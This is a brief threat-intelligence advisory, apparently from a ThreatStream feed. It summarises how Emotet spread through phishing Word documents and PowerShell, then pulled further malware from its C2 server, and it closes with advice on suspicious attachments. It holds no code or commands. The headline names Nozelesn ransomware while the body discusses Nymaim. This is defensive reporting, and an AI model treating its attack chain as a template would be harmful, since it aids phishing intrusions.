Emotet-Distributed Ransomware Loader for Nozelesn Found via Managed Detection and Response (Mar 29, 2019)
The banking trojan, "Emotet," has been observed distributing the "Nymaim" malware onto infected devices, according to researchers from Trend Micro. Emotet is distributed through phishing emails containing a malicious Word document that is downloaded via a web browser, in the observed instance, Google Chrome. Once opened, it will run a PowerShell script that ultimately downloads Emotet. It will then connect to the Command and Control (C2) server to obtain instructions to download more malware, specifically Nymaim, to execute on the system.
Recommendation: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.